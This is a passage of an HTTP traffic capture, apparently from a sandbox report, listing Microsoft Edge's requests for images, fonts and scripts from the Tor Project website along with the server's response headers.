User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-search.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "51ec-6247120c00846"
Accept-Ranges: bytes
Content-Length: 20972
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/windows.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/windows.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/windows.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:04 GMT
ETag: "6ba-5d788646de100"
Accept-Ranges: bytes
Content-Length: 1722
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/apple.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/apple.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/apple.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:04 GMT
ETag: "12ec-5d788646de100"
Accept-Ranges: bytes
Content-Length: 4844
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/tb85/tb85@2x.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/tb85/tb85@2x.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/tb85/tb85@2x.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:47:06 GMT
ETag: "24212-5d788a87f6a80"
Accept-Ranges: bytes
Content-Length: 147986
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/yec/x-dark.svg?h=353e04cc

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/x-dark.svg?h=353e04cc HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/x-dark.svg
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "8b0-6247120c017e6-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1010
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/svg+xml
Content-Language: en
GET

https://www.torproject.org/static/js/download.js?h=caaadf8f

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/js/download.js?h=caaadf8f HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/js/download.js
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:49 GMT
ETag: "1af-5d7886388ff40"
Accept-Ranges: bytes
Content-Length: 431
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript
Content-Language: en
GET

https://www.torproject.org/static/fonts/SourceSansPro/SourceSansPro-Light.ttf

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/SourceSansPro/SourceSansPro-Light.ttf HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/SourceSansPro/SourceSansPro-Light.ttf
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Mar 2022 14:36:00 GMT
ETag: "47748-5d9b5e65250f6-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Fri, 03 Jan 2025 10:09:23 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 129318
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/font-sfnt
Content-Language: en
GET

https://www.torproject.org/static/js/fallback.js?h=8a716acd

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/js/fallback.js?h=8a716acd HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/js/fallback.js
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 16 Oct 2023 18:35:54 GMT
ETag: "3f7-607d9ad1ff734"
Accept-Ranges: bytes
Content-Length: 1015
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:23 GMT
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/javascript
Content-Language: en
GET

https://www.torproject.org/static/images/tor-browser-mobile-window/png/TBA10.0.png?h=727fc609

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/tor-browser-mobile-window/png/TBA10.0.png?h=727fc609 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/tor-browser-mobile-window/png/TBA10.0.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:50 GMT
ETag: "14f3a-5d78863984180"
Accept-Ranges: bytes
Content-Length: 85818
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:23 GMT
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/android.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/android.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/android.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:04 GMT
ETag: "1036-5d788646de100"
Accept-Ranges: bytes
Content-Length: 4150
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/fonts/fontawesome/png/white/brands/instagram.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/fontawesome/png/white/brands/instagram.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/fonts/fontawesome/png/white/brands/instagram.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:28:04 GMT
ETag: "1560-5d788646de100"
Accept-Ranges: bytes
Content-Length: 5472
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/download/svg/stay-safe.svg?h=f11bdbfa

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/download/svg/stay-safe.svg?h=f11bdbfa HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/download/svg/stay-safe.svg
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:50 GMT
ETag: "f057-5d78863984180-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 22565
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/svg+xml
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-speak.svg?h=abdc7268

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-speak.svg?h=abdc7268 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-speak.svg
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "61d0-6247120c017e6-gzip"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 9959
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: image/svg+xml
Content-Language: en
GET

https://www.torproject.org/static/images/favicon/favicon.png

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/favicon/favicon.png HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/favicon/favicon.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:49 GMT
ETag: "4a0-5d7886388ff40"
Accept-Ranges: bytes
Content-Length: 1184
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:24 GMT
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/images/favicon/favicon.ico

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/favicon/favicon.ico HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:24 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/favicon/favicon.ico
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:49 GMT
ETag: "10be-5d7886388ff40"
Accept-Ranges: bytes
Content-Length: 4286
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:24 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: image/vnd.microsoft.icon
Content-Language: en
GET

https://www.torproject.org/static/images/yec/illo-yec-speak.png?h=abdc7268

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/images/yec/illo-yec-speak.png?h=abdc7268 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:27 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/images/yec/illo-yec-speak.png
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Mon, 14 Oct 2024 15:02:39 GMT
ETag: "bba6-6247120c017e6"
Accept-Ranges: bytes
Content-Length: 48038
Cache-Control: max-age=86400
Expires: Thu, 05 Dec 2024 10:09:27 GMT
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: image/png
Content-Language: en
GET

https://www.torproject.org/static/js/modernizr.js?h=9a7f0609

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/js/modernizr.js?h=9a7f0609 HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:09:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Xss-Protection: 1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15768000; preload
Onion-Location: http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/static/js/modernizr.js
Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-J/tux0AP4WAYsCxprPoE+2XJ+XNJ8Esd8nCF8o/diiw='; style-src 'self' 'unsafe-inline';
Last-Modified: Tue, 08 Feb 2022 21:27:49 GMT
ETag: "f1d-5d7886388ff40"
Accept-Ranges: bytes
Content-Length: 3869
Cache-Control: max-age=3600
Expires: Wed, 04 Dec 2024 11:09:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/javascript
Content-Language: en
GET

https://www.torproject.org/static/fonts/SourceCodePro/SourceCodePro-Regular.ttf

msedge.exe

Remote address:

204.8.99.144:443

Request

GET /static/fonts/SourceCodePro/SourceCodePro-Regular.ttf HTTP/1.1
Host: www.torproject.org
Connection: keep-alive
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
Origin: https://www.torproject.org
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
